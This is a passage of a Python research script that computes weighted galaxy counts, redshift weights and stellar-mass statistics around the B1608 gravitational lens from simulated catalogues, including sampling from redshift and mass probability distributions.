of each cell: %s \\n Limiting magnitude: %s\" % (str(sys.argv[1]), str(sys.argv[2]), str(sys.argv[3]), str(sys.argv[4])))\n\ndeginrad=0.0174532925\nzgrid=np.linspace(0.05,3.5,70)\nzgridint = np.arange(70) # 
because stats.rv_discrete only works with integer points\nz_s_B1608 = 1.39\nz_s_HE0435 = 1.69\nz_s_HE1104 = 2.32\nz_s_RX1131 = 0.66\n\nlimitx,limity = np.loadtxt(sys.argv[1], usecols=[4,5], unpack=True)\ncells_on_a_side = [int((round(np.max(limitx/deginrad)-round(np.min(limitx/deginrad))))*3600/240),int((round(np.max(limity/deginrad)-round(np.min(limity/deginrad))))*3600/240)]\nprint \"Position limits:\", round(np.min(limitx/deginrad)),round(np.max(limitx/deginrad)),round(np.min(limity/deginrad)),round(np.max(limity/deginrad))\ncentersx=np.zeros((cells_on_a_side[0],cells_on_a_side[1]))\ncentersy=np.zeros((cells_on_a_side[0],cells_on_a_side[1]))\nminx=round(np.min(limitx/deginrad))\nminy=round(np.min(limity/deginrad))\nfor i in range(cells_on_a_side[0]):\n for j in range(cells_on_a_side[1]):\n centersx[i][j]=minx * deginrad + i * deginrad/cells_on_a_side[0] + deginrad/cells_on_a_side[0]/2\n centersy[i][j]=miny * deginrad + j * deginrad/cells_on_a_side[1] + deginrad/cells_on_a_side[1]/2\n#print centersx,centersy\nB1608_specsim_gal = np.zeros((cells_on_a_side[0],cells_on_a_side[1]))\nB1608_specsim_oneoverr = np.zeros((cells_on_a_side[0],cells_on_a_side[1]))\nB1608_specsim_zweight = np.zeros((cells_on_a_side[0],cells_on_a_side[1]))\nB1608_specsim_mass = np.zeros((cells_on_a_side[0],cells_on_a_side[1]))\nB1608_specsim_mass2 = np.zeros((cells_on_a_side[0],cells_on_a_side[1]))\nB1608_specsim_mass3 = np.zeros((cells_on_a_side[0],cells_on_a_side[1]))\nB1608_specsim_zoverr = np.zeros((cells_on_a_side[0],cells_on_a_side[1]))\nB1608_specsim_massoverr = np.zeros((cells_on_a_side[0],cells_on_a_side[1]))\nB1608_specsim_mass2overr = np.zeros((cells_on_a_side[0],cells_on_a_side[1]))\nB1608_specsim_mass3overr = np.zeros((cells_on_a_side[0],cells_on_a_side[1]))\nB1608_specsim_zmassoverr = np.zeros((cells_on_a_side[0],cells_on_a_side[1]))\nB1608_specsim_zmass2overr = np.zeros((cells_on_a_side[0],cells_on_a_side[1]))\nB1608_origsim_gal = np.zeros((cells_on_a_side[0],cells_on_a_side[1]))\nB1608_origsim_oneoverr = np.zeros((cells_on_a_side[0],cells_on_a_side[1]))\nB1608_origsim_zweight = np.zeros((cells_on_a_side[0],cells_on_a_side[1]))\nB1608_origsim_mass = np.zeros((cells_on_a_side[0],cells_on_a_side[1]))\nB1608_origsim_mass2 = np.zeros((cells_on_a_side[0],cells_on_a_side[1]))\nB1608_origsim_mass3 = np.zeros((cells_on_a_side[0],cells_on_a_side[1]))\nB1608_origsim_zoverr = np.zeros((cells_on_a_side[0],cells_on_a_side[1]))\nB1608_origsim_massoverr = np.zeros((cells_on_a_side[0],cells_on_a_side[1]))\nB1608_origsim_mass2overr = np.zeros((cells_on_a_side[0],cells_on_a_side[1]))\nB1608_origsim_mass3overr = np.zeros((cells_on_a_side[0],cells_on_a_side[1]))\nB1608_origsim_zmassoverr = np.zeros((cells_on_a_side[0],cells_on_a_side[1]))\nB1608_origsim_zmass2overr = np.zeros((cells_on_a_side[0],cells_on_a_side[1]))\nB1608_sim_gal = np.zeros((cells_on_a_side[0],cells_on_a_side[1],int(str(sys.argv[2]))))\nB1608_sim_oneoverr = np.zeros((cells_on_a_side[0],cells_on_a_side[1],int(str(sys.argv[2]))))\nB1608_sim_zweight = np.zeros((cells_on_a_side[0],cells_on_a_side[1],int(str(sys.argv[2]))))\nB1608_sim_mass = np.zeros((cells_on_a_side[0],cells_on_a_side[1],int(str(sys.argv[2]))))\nB1608_sim_mass2 = np.zeros((cells_on_a_side[0],cells_on_a_side[1],int(str(sys.argv[2]))))\nB1608_sim_mass3 = np.zeros((cells_on_a_side[0],cells_on_a_side[1],int(str(sys.argv[2]))))\nB1608_sim_zoverr = np.zeros((cells_on_a_side[0],cells_on_a_side[1],int(str(sys.argv[2]))))\nB1608_sim_massoverr = 
np.zeros((cells_on_a_side[0],cells_on_a_side[1],int(str(sys.argv[2]))))\nB1608_sim_mass2overr = np.zeros((cells_on_a_side[0],cells_on_a_side[1],int(str(sys.argv[2]))))\nB1608_sim_mass3overr = np.zeros((cells_on_a_side[0],cells_on_a_side[1],int(str(sys.argv[2]))))\nB1608_sim_zmassoverr = np.zeros((cells_on_a_side[0],cells_on_a_side[1],int(str(sys.argv[2]))))\nB1608_sim_zmass2overr = np.zeros((cells_on_a_side[0],cells_on_a_side[1],int(str(sys.argv[2]))))\nB1608_tab_sim_gal = np.zeros((cells_on_a_side[0],cells_on_a_side[1],int(str(sys.argv[2]))))\nB1608_tab_sim_oneoverr = np.zeros((cells_on_a_side[0],cells_on_a_side[1],int(str(sys.argv[2]))))\nB1608_tab_sim_zweight = np.zeros((cells_on_a_side[0],cells_on_a_side[1],int(str(sys.argv[2]))))\nB1608_tab_sim_mass = np.zeros((cells_on_a_side[0],cells_on_a_side[1],int(str(sys.argv[2]))))\nB1608_tab_sim_mass2 = np.zeros((cells_on_a_side[0],cells_on_a_side[1],int(str(sys.argv[2]))))\nB1608_tab_sim_mass3 = np.zeros((cells_on_a_side[0],cells_on_a_side[1],int(str(sys.argv[2]))))\nB1608_tab_sim_zoverr = np.zeros((cells_on_a_side[0],cells_on_a_side[1],int(str(sys.argv[2]))))\nB1608_tab_sim_massoverr = np.zeros((cells_on_a_side[0],cells_on_a_side[1],int(str(sys.argv[2]))))\nB1608_tab_sim_mass2overr = np.zeros((cells_on_a_side[0],cells_on_a_side[1],int(str(sys.argv[2]))))\nB1608_tab_sim_mass3overr = np.zeros((cells_on_a_side[0],cells_on_a_side[1],int(str(sys.argv[2]))))\nB1608_tab_sim_zmassoverr = np.zeros((cells_on_a_side[0],cells_on_a_side[1],int(str(sys.argv[2]))))\nB1608_tab_sim_zmass2overr = np.zeros((cells_on_a_side[0],cells_on_a_side[1],int(str(sys.argv[2]))))\n\nwith open(sys.argv[1]) as file: #B1608_sims#.lst\n for gal in file:\n i=i+1\n if i in [1000, 5000, 10000, 20000, 30000, 40000, 50000, 60000, 70000, 80000, 90000, 100000, 110000, 120000, 130000, 140000, 150000, 160000, 170000, 180000, 190000, 200000]:\n print i, \"objects...\"\n if (gal!=\"\\n\"):\n ID=str(gal.split()[0])\n posx = float(gal.split()[4])\n posy = float(gal.split()[5])\n MAG_i = float(gal.split()[12])\n catmass = np.log10(float(gal.split()[1]))\n catz = float(gal.split()[2])\n Z_B = float(gal.split()[3])\n Z_B_MIN = Z_B - 0.13 # TEMPORARY solution until i include this value in the _pdz catalogue\n Z_B_MAX = Z_B + 0.13\n Mstar_best_catz = float(gal.split()[93])\n Mstar_inf_catz = float(gal.split()[94])\n Mstar_med_catz = float(gal.split()[95])\n Mstar_sup_catz = float(gal.split()[96])\n Mstar_best_zb = float(gal.split()[97])\n Mstar_inf_zb = float(gal.split()[98])\n Mstar_med_zb = float(gal.split()[99])\n Mstar_sup_zb = float(gal.split()[100])\n x=int((posx/deginrad-minx)*cells_on_a_side[0])\n y=int((posy/deginrad-miny)*cells_on_a_side[1])\n #print x,y #posx/deginrad/cells_on_a_side[0],posy/deginrad/cells_on_a_side[1],minx,miny\n #print ID,posx,posy,MAG_i,catmass,catz,Z_B,Z_B_MIN,Z_B_MAX,Mstar_best_catz,Mstar_inf_catz,Mstar_med_catz, Mstar_sup_catz, Mstar_best_zb, Mstar_inf_zb,Mstar_med_zb,Mstar_sup_zb\n sep=np.sqrt((centersx[x][y]-posx)**2 + (centersy[x][y]-posy)**2)*1/deginrad*3600 # in arcsec\n if (MAG_i <= int(str(sys.argv[4]))) and (sep >= 4) and (sep <= int(str(sys.argv[3]))):\n\n #spec\n if catz <= z_s_B1608:\n B1608_specsim_gal[x][y] = B1608_specsim_gal[x][y] + 1\n B1608_specsim_zweight[x][y] = B1608_specsim_zweight[x][y] + (z_s_B1608 * catz) - (catz * catz)\n B1608_specsim_mass[x][y] = B1608_specsim_mass[x][y] + 10**Mstar_med_catz\n B1608_specsim_mass2[x][y] = B1608_specsim_mass2[x][y] + ((10**Mstar_med_catz) * (10**Mstar_med_catz))\n B1608_specsim_mass3[x][y] = 
B1608_specsim_mass3[x][y] + ((10**Mstar_med_catz) * (10**Mstar_med_catz) * (10**Mstar_med_catz))\n if (sep <= 10):\n B1608_specsim_oneoverr[x][y] = B1608_specsim_oneoverr[x][y] + 0.1\n B1608_specsim_zoverr[x][y] = B1608_specsim_zoverr[x][y] + (((z_s_B1608 * catz) - (catz * catz)) / 10)\n B1608_specsim_massoverr[x][y] = B1608_specsim_massoverr[x][y] + ((10**Mstar_med_catz) / 10)\n B1608_specsim_mass2overr[x][y] = B1608_specsim_mass2overr[x][y] + (((10**Mstar_med_catz) * (10**Mstar_med_catz)) / 10)\n B1608_specsim_mass3overr[x][y] = B1608_specsim_mass3overr[x][y] + (((10**Mstar_med_catz) * (10**Mstar_med_catz) * (10**Mstar_med_catz)) / 10)\n B1608_specsim_zmassoverr[x][y] = B1608_specsim_zmassoverr[x][y] + (((z_s_B1608 * catz) - (catz * catz)) * (10**Mstar_med_catz) / 10)\n B1608_specsim_zmass2overr[x][y] = B1608_specsim_zmass2overr[x][y] + (((z_s_B1608 * catz) - (catz * catz)) * (10**Mstar_med_catz) * (10**Mstar_med_catz) / 10)\n else:\n B1608_specsim_oneoverr[x][y] = B1608_specsim_oneoverr[x][y] + 1. / sep\n B1608_specsim_zoverr[x][y] = B1608_specsim_zoverr[x][y] + (((z_s_B1608 * catz) - (catz * catz)) / sep)\n B1608_specsim_massoverr[x][y] = B1608_specsim_massoverr[x][y] + ((10**Mstar_med_catz) / sep)\n B1608_specsim_mass2overr[x][y] = B1608_specsim_mass2overr[x][y] + (((10**Mstar_med_catz) * (10**Mstar_med_catz)) / sep)\n B1608_specsim_mass3overr[x][y] = B1608_specsim_mass3overr[x][y] + (((10**Mstar_med_catz) * (10**Mstar_med_catz) * (10**Mstar_med_catz)) / sep)\n B1608_specsim_zmassoverr[x][y] = B1608_specsim_zmassoverr[x][y] + (((z_s_B1608 * catz) - (catz * catz)) * (10**Mstar_med_catz) / sep)\n B1608_specsim_zmass2overr[x][y] = B1608_specsim_zmass2overr[x][y] + (((z_s_B1608 * catz) - (catz * catz)) * (10**Mstar_med_catz) * (10**Mstar_med_catz) / sep)\n\n #orig:\n where = 100 + int(np.max([Z_B/0.05, 1])) * 4 #the column in the catalogue\n if Mstar_med_zb < 0:\n if float(gal.split()[where-1])>0: #mass_med\n Mstar_med_zb=float(gal.split()[where-1])\n elif float(gal.split()[where-3])>0: #mass_best\n Mstar_med_zb=float(gal.split()[where-3])\n else:\n pos=int(np.max([Z_B/0.05, 1]))\n while (pos<68) and (float(gal.split()[100 + pos * 4 - 3])<=0):\n pos=pos+1\n Mstar_med_zb=float(gal.split()[100 + pos * 4 - 3])\n if Mstar_med_zb<=0:\n pos=int(np.max([Z_B/0.05, 1]))\n while (pos>1) and (float(gal.split()[100 + pos * 4 - 3])<=0):\n pos=pos-1\n Mstar_med_zb=float(gal.split()[100 + pos * 4 - 3])\n #print Mstar_med_zb\n if Mstar_med_zb<=0:\n Mstar_med_zb=9\n if (Mstar_inf_zb < 0) or (Mstar_sup_zb < 0):\n Mstar_inf_zb=Mstar_med_zb-0.1\n Mstar_sup_zb=Mstar_med_zb+0.1\n if Z_B <= z_s_B1608:\n B1608_origsim_gal[x][y] = B1608_origsim_gal[x][y] + 1\n B1608_origsim_zweight[x][y] = B1608_origsim_zweight[x][y] + (z_s_B1608 * Z_B) - (Z_B * Z_B)\n B1608_origsim_mass[x][y] = B1608_origsim_mass[x][y] + 10**Mstar_med_zb\n B1608_origsim_mass2[x][y] = B1608_origsim_mass2[x][y] + ((10**Mstar_med_zb) * (10**Mstar_med_zb))\n B1608_origsim_mass3[x][y] = B1608_origsim_mass3[x][y] + ((10**Mstar_med_zb) * (10**Mstar_med_zb) * (10**Mstar_med_zb))\n if (sep <= 10):\n B1608_origsim_oneoverr[x][y] = B1608_origsim_oneoverr[x][y] + 0.1\n B1608_origsim_zoverr[x][y] = B1608_origsim_zoverr[x][y] + (((z_s_B1608 * Z_B) - (Z_B * Z_B)) / 10)\n B1608_origsim_massoverr[x][y] = B1608_origsim_massoverr[x][y] + ((10**Mstar_med_zb) / 10)\n B1608_origsim_mass2overr[x][y] = B1608_origsim_mass2overr[x][y] + (((10**Mstar_med_zb) * (10**Mstar_med_zb)) / 10)\n B1608_origsim_mass3overr[x][y] = B1608_origsim_mass3overr[x][y] + 
(((10**Mstar_med_zb) * (10**Mstar_med_zb) * (10**Mstar_med_zb)) / 10)\n B1608_origsim_zmassoverr[x][y] = B1608_origsim_zmassoverr[x][y] + (((z_s_B1608 * Z_B) - (Z_B * Z_B)) * (10**Mstar_med_zb) / 10)\n B1608_origsim_zmass2overr[x][y] = B1608_origsim_zmass2overr[x][y] + (((z_s_B1608 * Z_B) - (Z_B * Z_B)) * (10**Mstar_med_zb) * (10**Mstar_med_zb) / 10)\n else:\n B1608_origsim_oneoverr[x][y] = B1608_origsim_oneoverr[x][y] + 1. / sep\n B1608_origsim_zoverr[x][y] = B1608_origsim_zoverr[x][y] + (((z_s_B1608 * Z_B) - (Z_B * Z_B)) / sep)\n B1608_origsim_massoverr[x][y] = B1608_origsim_massoverr[x][y] + ((10**Mstar_med_zb) / sep)\n B1608_origsim_mass2overr[x][y] = B1608_origsim_mass2overr[x][y] + (((10**Mstar_med_zb) * (10**Mstar_med_zb)) / sep)\n B1608_origsim_mass3overr[x][y] = B1608_origsim_mass3overr[x][y] + (((10**Mstar_med_zb) * (10**Mstar_med_zb) * (10**Mstar_med_zb)) / sep)\n B1608_origsim_zmassoverr[x][y] = B1608_origsim_zmassoverr[x][y] + (((z_s_B1608 * Z_B) - (Z_B * Z_B)) * (10**Mstar_med_zb) / sep)\n B1608_origsim_zmass2overr[x][y] = B1608_origsim_zmass2overr[x][y] + (((z_s_B1608 * Z_B) - (Z_B * Z_B)) * (10**Mstar_med_zb) * (10**Mstar_med_zb) / sep)\n\n\n\n\n\n\n\n \n samplesup=np.zeros(int(str(sys.argv[2])))\n sampleinf=np.zeros(int(str(sys.argv[2])))\n fracz=1-1.0*(Z_B_MAX-Z_B)/(Z_B_MAX-Z_B_MIN)\n fracmass=1-(1.0*(10**Mstar_sup_zb-10**Mstar_med_zb)/(10**Mstar_sup_zb-10**Mstar_inf_zb))\n\n #if str(sys.argv[8]) == \"samp\":\n if (fracz > 0) and (fracz < 1):\n samplesup=Z_B+abs(np.random.normal(0, Z_B_MAX-Z_B, int(str(sys.argv[2]))))\n sampleinf=Z_B-abs(np.random.normal(0, Z_B-Z_B_MIN, int(str(sys.argv[2]))))\n # no negative redshifts\n while len(sampleinf[sampleinf<0]) > 0:\n sampleinf[sampleinf<0]=Z_B-abs(np.random.normal(0, Z_B-Z_B_MIN, len(sampleinf[sampleinf<0])))\n rand=np.random.random(int(str(sys.argv[2])))\n samplez=sampleinf\n samplez[np.where(rand>fracz)]=samplesup[np.where(rand>fracz)]\n #samplez[samplez<0]=0\n if (fracz <= 0) or (fracz >= 1):\n samplez=np.random.normal(Z_B_MIN+(Z_B_MAX-Z_B_MIN)/2, (Z_B_MAX-Z_B_MIN)/2, int(str(sys.argv[2])))\n #samplez[samplez<0]=0\n # for mass, assume gaussian distribution in log, not normal space, so I don't get things like negative mass\n if (fracmass > 0) and (fracmass < 1):\n samplesup=10**(Mstar_med_zb+abs(np.random.normal(0, Mstar_sup_zb-Mstar_med_zb, int(str(sys.argv[2])))))\n sampleinf=10**(Mstar_med_zb-abs(np.random.normal(0, Mstar_med_zb-Mstar_inf_zb, int(str(sys.argv[2])))))\n rand=np.random.random(int(str(sys.argv[2])))\n samplemass=sampleinf\n samplemass[np.where(rand>fracmass)]=samplesup[np.where(rand>fracmass)]\n if (fracmass <= 0) or (fracmass >= 1):\n samplemass=10**np.random.normal(Mstar_inf_zb+(Mstar_sup_zb-Mstar_inf_zb)/2, (Mstar_sup_zb-Mstar_inf_zb)/2, int(str(sys.argv[2])))\n #print \"samplemass\"\n #print samplemass\n #ignore objects with z>z_source for all weights when drawing from the z PDF\n B1608_sim_gal[x][y][samplez<z_s_B1608] = B1608_sim_gal[x][y][samplez<z_s_B1608] + 1\n B1608_sim_zweight[x][y][samplez<z_s_B1608] = B1608_sim_zweight[x][y][samplez<z_s_B1608] + (z_s_B1608 * samplez[samplez<z_s_B1608]) - (samplez[samplez<z_s_B1608]**2)\n B1608_sim_mass[x][y][samplez<z_s_B1608] = B1608_sim_mass[x][y][samplez<z_s_B1608] + samplemass[samplez<z_s_B1608]\n B1608_sim_mass2[x][y][samplez<z_s_B1608] = B1608_sim_mass2[x][y][samplez<z_s_B1608] + samplemass[samplez<z_s_B1608]**2\n B1608_sim_mass3[x][y][samplez<z_s_B1608] = B1608_sim_mass3[x][y][samplez<z_s_B1608] + samplemass[samplez<z_s_B1608]**3\n #print 
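\n # note on the draws above: fracz (and fracmass, in log space) is the weight of the lower half of an asymmetric two-sided Gaussian built from the inf/med/sup values; each sample picks the lower or upper half-Gaussian with that probability\n #print 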
(catsim['Z_B_MAX'][i] - catsim['Z_B_MIN'][i])/2\n if (sep <= 10):\n B1608_sim_oneoverr[x][y][samplez<z_s_B1608] = B1608_sim_oneoverr[x][y][samplez<z_s_B1608] + 0.1\n B1608_sim_zoverr[x][y][samplez<z_s_B1608] = B1608_sim_zoverr[x][y][samplez<z_s_B1608] + (((z_s_B1608 * samplez[samplez<z_s_B1608]) - (samplez[samplez<z_s_B1608]**2)) / 10)\n B1608_sim_massoverr[x][y][samplez<z_s_B1608] = B1608_sim_massoverr[x][y][samplez<z_s_B1608] + (samplemass[samplez<z_s_B1608] / 10)\n B1608_sim_mass2overr[x][y][samplez<z_s_B1608] = B1608_sim_mass2overr[x][y][samplez<z_s_B1608] + ((samplemass[samplez<z_s_B1608]**2) / 10)\n B1608_sim_mass3overr[x][y][samplez<z_s_B1608] = B1608_sim_mass3overr[x][y][samplez<z_s_B1608] + ((samplemass[samplez<z_s_B1608]**3) / 10)\n B1608_sim_zmassoverr[x][y][samplez<z_s_B1608] = B1608_sim_zmassoverr[x][y][samplez<z_s_B1608] + (((z_s_B1608 * samplez[samplez<z_s_B1608]) - (samplez[samplez<z_s_B1608]**2)) * samplemass[samplez<z_s_B1608] / 10)\n B1608_sim_zmass2overr[x][y][samplez<z_s_B1608] = B1608_sim_zmass2overr[x][y][samplez<z_s_B1608] + (((z_s_B1608 * samplez[samplez<z_s_B1608]) - (samplez[samplez<z_s_B1608]**2)) * (samplemass[samplez<z_s_B1608]**2) / 10)\n else:\n B1608_sim_oneoverr[x][y][samplez<z_s_B1608] = B1608_sim_oneoverr[x][y][samplez<z_s_B1608] + 1/sep\n B1608_sim_zoverr[x][y][samplez<z_s_B1608] = B1608_sim_zoverr[x][y][samplez<z_s_B1608] + (((z_s_B1608 * samplez[samplez<z_s_B1608]) - (samplez[samplez<z_s_B1608]**2)) / sep)\n B1608_sim_massoverr[x][y][samplez<z_s_B1608] = B1608_sim_massoverr[x][y][samplez<z_s_B1608] + (samplemass[samplez<z_s_B1608] / sep)\n B1608_sim_mass2overr[x][y][samplez<z_s_B1608] = B1608_sim_mass2overr[x][y][samplez<z_s_B1608] + ((samplemass[samplez<z_s_B1608]**2) / sep)\n B1608_sim_mass3overr[x][y][samplez<z_s_B1608] = B1608_sim_mass3overr[x][y][samplez<z_s_B1608] + ((samplemass[samplez<z_s_B1608]**3) / sep)\n B1608_sim_zmassoverr[x][y][samplez<z_s_B1608] = B1608_sim_zmassoverr[x][y][samplez<z_s_B1608] + (((z_s_B1608 * samplez[samplez<z_s_B1608]) - (samplez[samplez<z_s_B1608]**2)) * samplemass[samplez<z_s_B1608] / sep)\n B1608_sim_zmass2overr[x][y][samplez<z_s_B1608] = B1608_sim_zmass2overr[x][y][samplez<z_s_B1608] + (((z_s_B1608 * samplez[samplez<z_s_B1608]) - (samplez[samplez<z_s_B1608]**2)) * (samplemass[samplez<z_s_B1608]**2) / sep)\n \n #if str(sys.argv[8]) == \"tab\":\n massbest_tab=np.zeros(70)\n massinf_tab=np.zeros(70)\n massmed_tab=np.zeros(70)\n masssup_tab=np.zeros(70)\n pdz_tab=np.zeros(70)\n for m in range(70):\n pdz_tab[m]=float(gal.split()[22+m])\n if pdz_tab[m]<0.001:\n pdz_tab[m]=0\n if len(pdz_tab[pdz_tab!=0])!=0:\n for m in range(70):\n if pdz_tab[m]!=0:\n massbest_tab[m]=float(gal.split()[100 + (m+1) * 4 - 3])\n #print massbest_tab[m]\n if massbest_tab[m]<0:\n massbest_tab[m]=9 # very small number of exceptions\n for m in range(70):\n if pdz_tab[m]!=0:\n massmed_tab[m]=float(gal.split()[100 + (m+1) * 4 - 1])\n if massmed_tab[m]<0:\n massmed_tab[m]=massbest_tab[m]\n massinf_tab[m]=float(gal.split()[100 + (m+1) * 4 - 2])\n masssup_tab[m]=float(gal.split()[100 + (m+1) * 4])\n if massinf_tab[m]<0:\n massinf_tab[m]=massmed_tab[m]-0.1\n if masssup_tab[m]<0:\n masssup_tab[m]=massmed_tab[m]+0.1\n #print ID,m,massbest_tab[m],massinf_tab[m],masssup_tab[m],masssup_tab[m]\n custm = stats.rv_discrete(name='custm', values=(zgridint, pdz_tab))\n sample=custm.rvs(size=int(str(sys.argv[2])))\n iter=0\n while len(sample[pdz_tab[sample]==0]) != 0: # happens because the probabilities do not sum exactly to 1; first reshuffle 10 times; if this 
does not solve the problem replace with the value having maximum probability; happens because the probabilities do not sum exactly to 1\n iter=iter+1\n sample=custm.rvs(size=int(str(sys.argv[2])))\n if iter==10:\n #print pdz_tab,ID,sample,str(sys.argv[1])\n sample[pdz_tab[sample]==0]=np.where(pdz_tab==np.max(pdz_tab[sample[pdz_tab[sample]!=0]]))[0][0]\n samplez=zgrid[sample]\n sample_massinf_tab=massinf_tab[sample] # since \"sample\" is constant, this insures that Mstar corresponds to z\n sample_massmed_tab=massmed_tab[sample]\n #print sample_massmed_tab\n sample_masssup_tab=masssup_tab[sample]\n sample_lenssup=np.zeros(int(str(sys.argv[2])))\n sample_lensinf=np.zeros(int(str(sys.argv[2])))\n #print sample_masssup_tab, sample_massmed_tab, samplez, catfield['ID'][0]\n iter=0\n for l in range(int(str(sys.argv[2]))):\n if sample_massmed_tab[l]==0: #I SHOULD NOT HAVE TO DO THIS, THERE IS A BUG; actually I tested and this happens because of missing stellar mass for z=3.5 (the edge)\n sample_massmed_tab[l]=9\n sample_massinf_tab[l]=8.9\n sample_masssup_tab[l]=9.1\n if iter==0:\n print \"Exception!\", ID\n iter=iter+1\n sample_lenssup[l]=10**(sample_massmed_tab[l]+abs(np.random.normal(0, sample_masssup_tab[l]-sample_massmed_tab[l], 1)))\n sample_lensinf[l]=10**(sample_massmed_tab[l]-abs(np.random.normal(0, sample_massmed_tab[l]-sample_massinf_tab[l], 1)))\n rand=np.random.random(1)\n samplemass[l]=sample_lensinf[l]\n fracmass=1-(1.0*(10**sample_masssup_tab[l]-10**sample_massmed_tab[l])/(10**sample_masssup_tab[l]-10**sample_massinf_tab[l]))\n if rand>fracmass:\n samplemass[l]=sample_lenssup[l]\n #print zgrid[sample]\n #print massinf_tab[sample]\n #print massmed_tab[sample]\n #print masssup_tab[sample]\n #print samplemass\n #ignore objects with z>z_source for all weights when drawing from the z PDF\n B1608_tab_sim_gal[x][y][samplez<z_s_B1608] = B1608_tab_sim_gal[x][y][samplez<z_s_B1608] + 1\n B1608_tab_sim_zweight[x][y][samplez<z_s_B1608] = B1608_tab_sim_zweight[x][y][samplez<z_s_B1608] + (z_s_B1608 * samplez[samplez<z_s_B1608]) - (samplez[samplez<z_s_B1608]**2)\n B1608_tab_sim_mass[x][y][samplez<z_s_B1608] = B1608_tab_sim_mass[x][y][samplez<z_s_B1608] + samplemass[samplez<z_s_B1608]\n B1608_tab_sim_mass2[x][y][samplez<z_s_B1608] = B1608_tab_sim_mass2[x][y][samplez<z_s_B1608] + samplemass[samplez<z_s_B1608]**2\n B1608_tab_sim_mass3[x][y][samplez<z_s_B1608] = B1608_tab_sim_mass3[x][y][samplez<z_s_B1608] + samplemass[samplez<z_s_B1608]**3\n #print (catfield['Z_B_MAX'][i] - catfield['Z_B_MIN'][i])/2\n if (sep <= 10):\n B1608_tab_sim_oneoverr[x][y][samplez<z_s_B1608] = B1608_tab_sim_oneoverr[x][y][samplez<z_s_B1608] + 0.1\n B1608_tab_sim_zoverr[x][y][samplez<z_s_B1608] = B1608_tab_sim_zoverr[x][y][samplez<z_s_B1608] + (((z_s_B1608 * samplez[samplez<z_s_B1608]) - (samplez[samplez<z_s_B1608]**2)) / 10)\n B1608_tab_sim_massoverr[x][y][samplez<z_s_B1608] = B1608_tab_sim_massoverr[x][y][samplez<z_s_B1608] + (samplemass[samplez<z_s_B1608] / 10)\n B1608_tab_sim_mass2overr[x][y][samplez<z_s_B1608] = B1608_tab_sim_mass2overr[x][y][samplez<z_s_B1608] + ((samplemass[samplez<z_s_B1608]**2) / 10)\n B1608_tab_sim_mass3overr[x][y][samplez<z_s_B1608] = B1608_tab_sim_mass3overr[x][y][samplez<z_s_B1608] + ((samplemass[samplez<z_s_B1608]**3) / 10)\n B1608_tab_sim_zmassoverr[x][y][samplez<z_s_B1608] = B1608_tab_sim_zmassoverr[x][y][samplez<z_s_B1608] + (((z_s_B1608 * samplez[samplez<z_s_B1608]) - (samplez[samplez<z_s_B1608]**2)) * samplemass[samplez<z_s_B1608] / 10)\n B1608_tab_sim_zmass2overr[x][y][samplez<z_s_B1608] = 
B1608_tab_sim_zmass2overr[x][y][samplez<z_s_B1608] + (((z_s_B1608 * samplez[samplez<z_s_B1608]) - (samplez[samplez<z_s_B1608]**2)) * (samplemass[samplez<z_s_B1608]**2) / 10)\n else:\n B1608_tab_sim_oneoverr[x][y][samplez<z_s_B1608] = B1608_tab_sim_oneoverr[x][y][samplez<z_s_B1608] + 1/sep\n B1608_tab_sim_zoverr[x][y][samplez<z_s_B1608] = B1608_tab_sim_zoverr[x][y][samplez<z_s_B1608] + (((z_s_B1608 * samplez[samplez<z_s_B1608]) - (samplez[samplez<z_s_B1608]**2)) / sep)\n B1608_tab_sim_massoverr[x][y][samplez<z_s_B1608] = B1608_tab_sim_massoverr[x][y][samplez<z_s_B1608] + (samplemass[samplez<z_s_B1608] / sep)\n B1608_tab_sim_mass2overr[x][y][samplez<z_s_B1608] = B1608_tab_sim_mass2overr[x][y][samplez<z_s_B1608] + ((samplemass[samplez<z_s_B1608]**2) / sep)\n B1608_tab_sim_mass3overr[x][y][samplez<z_s_B1608] = B1608_tab_sim_mass3overr[x][y][samplez<z_s_B1608] + ((samplemass[samplez<z_s_B1608]**3) / sep)\n B1608_tab_sim_zmassoverr[x][y][samplez<z_s_B1608] = B1608_tab_sim_zmassoverr[x][y][samplez<z_s_B1608] + (((z_s_B1608 * samplez[samplez<z_s_B1608]) - (samplez[samplez<z_s_B1608]**2)) * samplemass[samplez<z_s_B1608] / sep)\n B1608_tab_sim_zmass2overr[x][y][samplez<z_s_B1608] = B1608_tab_sim_zmass2overr[x][y][samplez<z_s_B1608] + (((z_s_B1608 * samplez[samplez<z_s_B1608]) - (samplez[samplez<z_s_B1608]**2)) * (samplemass[samplez<z_s_B1608]**2) / sep)\n\nB1608_specsim_mass2rms = np.sqrt(B1608_specsim_mass2)\nB1608_specsim_mass3rms = scipy.special.cbrt(B1608_specsim_mass3)\nB1608_specsim_mass2overrrms = np.sqrt(B1608_specsim_mass2overr)\nB1608_specsim_mass3overrrms = scipy.special.cbrt(B1608_specsim_mass3overr)\n#if str(sys.argv[8]) == \"orig\":\nB1608_origsim_mass2rms = np.sqrt(B1608_origsim_mass2)\nB1608_origsim_mass3rms = scipy.special.cbrt(B1608_origsim_mass3)\nB1608_origsim_mass2overrrms = np.sqrt(B1608_origsim_mass2overr)\nB1608_origsim_mass3overrrms = scipy.special.cbrt(B1608_origsim_mass3overr)\n#if str(sys.argv[8]) == \"samp\":\nB1608_sim_mass2rms = np.sqrt(B1608_sim_mass2)\nB1608_sim_mass3rms = scipy.special.cbrt(B1608_sim_mass3)\nB1608_sim_mass2overrrms = np.sqrt(B1608_sim_mass2overr)\nB1608_sim_mass3overrrms = scipy.special.cbrt(B1608_sim_mass3overr)\n#if str(sys.argv[8]) == \"tab\":\nB1608_tab_sim_mass2rms = np.sqrt(B1608_tab_sim_mass2)\nB1608_tab_sim_mass3rms = scipy.special.cbrt(B1608_tab_sim_mass3)\nB1608_tab_sim_mass2overrrms = np.sqrt(B1608_tab_sim_mass2overr)\nB1608_tab_sim_mass3overrrms = scipy.special.cbrt(B1608_tab_sim_mass3overr)\n\ns = open('%s_B1608_spec_size%s_i%s.lst' % (str(sys.argv[1])[0:len(str(sys.argv[1]))-4],str(sys.argv[3]),str(sys.argv[4])),'w')\nf = open('%s_B1608_orig_size%s_i%s.lst' % (str(sys.argv[1])[0:len(str(sys.argv[1]))-4],str(sys.argv[3]),str(sys.argv[4])),'w')\n#if str(sys.argv[8]) == \"samp\":\ng = open('%s_B1608_samp_size%s_i%s.lst' % (str(sys.argv[1])[0:len(str(sys.argv[1]))-4],str(sys.argv[3]),str(sys.argv[4])),'w')\n#if str(sys.argv[8]) == \"tab\":\nh = open('%s_B1608_tab_size%s_i%s.lst' % 